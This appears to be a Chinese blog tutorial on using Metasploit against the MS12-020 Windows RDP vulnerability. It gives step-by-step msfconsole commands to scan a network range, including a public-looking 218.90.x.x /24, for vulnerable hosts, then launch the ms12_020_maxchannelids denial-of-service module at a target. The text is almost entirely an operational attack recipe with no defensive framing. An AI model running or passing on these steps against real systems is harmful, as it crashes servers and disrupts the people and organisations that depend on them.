首先打开kali的命令提示符,输入msfconsole启动吧msf,接着输入search+漏洞编号来查看它的漏洞利用模块。这里一共有两个漏洞利用模块,一个是用来侦查目标网络是否存在漏洞主 机。一个是攻击模块。
打开命令终端输入msfconsole
输入 search ms12-020
首先利用第一个模块来对目标网段进行扫描。
输入 use auxiliary/scanner/rdp/ms12_020_check 进入漏洞利用模块
输入show option
这里需要设置RHOSTS(目标网段) THREADS(线程)。
那么输入 set RHOSTS 218.90.*.0/24 扫描目标网段。
接着 set THREADS 50 设置线程,我这里设置的线程是45.
然后输入 run 进行扫描。
接着他会对目标网段尽心扫描,速度还蛮快的。通过上图可以看到在192.168.75.128:3389这个地址后面的这一句The target is vulnerable,这句的意思是目标是脆弱的,那么说明这台主机存在这个漏洞。
接着我们需要用到另一个模块来对漏洞主机进行攻击。
输入 use auxiliary/dos/windows/rdp/ms12_020_maxchannelids 进入攻击模块。
接着依旧是输入 show options 查看需设置选项。
设置需要攻击的ip地址,输入run开始攻击
网友评论